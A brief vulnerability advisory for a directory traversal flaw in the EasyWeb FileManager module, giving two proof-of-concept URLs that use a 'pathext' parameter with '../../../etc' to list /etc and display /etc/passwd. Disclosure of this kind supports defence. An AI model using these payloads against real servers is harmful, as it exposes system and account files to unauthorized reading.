EasyWeb FileManager Module Directory Traversal Vulnerability

EasyWeb FileManager Module Directory Traversal Vulnerability

No exploit is required.

The following proof of concept is available:
/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc

/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd